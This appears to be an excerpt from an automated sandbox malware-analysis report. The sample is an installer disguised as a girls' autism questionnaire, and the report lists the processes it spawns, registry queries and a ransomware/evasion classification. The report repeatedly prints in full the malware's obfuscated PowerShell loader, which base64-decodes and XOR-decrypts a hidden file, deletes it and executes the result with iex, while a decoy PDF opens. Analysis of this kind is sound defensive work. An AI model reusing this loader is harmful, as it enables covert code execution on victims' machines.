            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=18138760929948388568 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=18138760929948388568 --renderer-client-id=2 --mojo-platform-channel-handle=1708 --allow-no-sandbox-job /prefetch:1
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=1964537546466602417 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=8469343885171470224 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=8469343885171470224 --renderer-client-id=4 --mojo-platform-channel-handle=1800 --allow-no-sandbox-job /prefetch:1
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=3770922529545536729 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=3770922529545536729 --renderer-client-id=5 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job /prefetch:1
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=15315623175826486505 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=15315623175826486505 --renderer-client-id=6 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job /prefetch:1
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdfJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer /prefetch:1 "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdfJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043Jump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043Jump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=18138760929948388568 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=18138760929948388568 --renderer-client-id=2 --mojo-platform-channel-handle=1708 --allow-no-sandbox-job /prefetch:1
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=1964537546466602417 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=8469343885171470224 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=8469343885171470224 --renderer-client-id=4 --mojo-platform-channel-handle=1800 --allow-no-sandbox-job /prefetch:1
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=3770922529545536729 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=3770922529545536729 --renderer-client-id=5 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job /prefetch:1
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=15315623175826486505 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=15315623175826486505 --renderer-client-id=6 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job /prefetch:1
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_004AF110
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_2_0060F6D8
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeFile created: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmpJump to behavior
            Source: classification engineClassification label: mal100.rans.evad.winEXE@39/179@0/1
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_0062CFB8 GetVersion,CoCreateInstance,3_2_0062CFB8
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0041A4DC GetDiskFreeSpaceW,0_2_0041A4DC
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
